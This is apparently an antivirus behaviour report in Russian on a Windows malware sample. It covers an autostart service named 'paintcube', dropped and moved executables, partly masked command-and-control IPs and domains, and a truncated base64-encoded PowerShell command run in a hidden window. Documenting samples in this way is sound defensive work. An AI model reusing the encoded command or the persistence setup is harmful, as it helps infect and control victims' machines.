Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\paintcube] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\paintcube] 'ImagePath' = '"%WINDIR%\SysWOW64\paintcube.exe"'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABIAHQAZgB5AG4AZwBjAHYAZQBrAHoAaQA9ACcAQwB6AGMAeABrAG4AZwB1AGEAdAByAGsAZgAnADsAJABZAGQAcQBjAHAAbABiAGgAegBlAHMAdgAgAD0AIAAnADQAOAA3ACcAOwAkAFAAegBxAG0AdgBpAHQAZQBtAD0AJwBEAHoAZgBkAGgAZQB...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\487.exe
Перемещает следующие файлы
- %HOMEPATH%\487.exe в %WINDIR%\syswow64\paintcube.exe
Сетевая активность
Подключается к
- '94.##.21.187':8080
- '18#.#31.62.54':80
- '17#.#30.31.177':8080
- '51.##5.165.160':8080
TCP
Запросы HTTP GET
- http://ch###omiki.ru/wp-admin/yjmtr1k4/
UDP
- DNS ASK na####onsulting.com
- DNS ASK ke###hub.com
- DNS ASK ch###omiki.ru
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\487.exe'
- '%WINDIR%\syswow64\paintcube.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABIAHQAZgB5AG4AZwBjAHYAZQBrAHoAaQA9ACcAQwB6AGMAeABrAG4AZwB1AGEAdAByAGsAZgAnADsAJABZAGQAcQBjAHAAbABiAGgAegBlAHMAdgAgAD0AIAAnADQAOAA3ACcAOwAkAFAAegBxAG0AdgBpAHQAZQBtAD0AJwBEAHoAZgBkAGgAZQB...' (со скрытым окном)
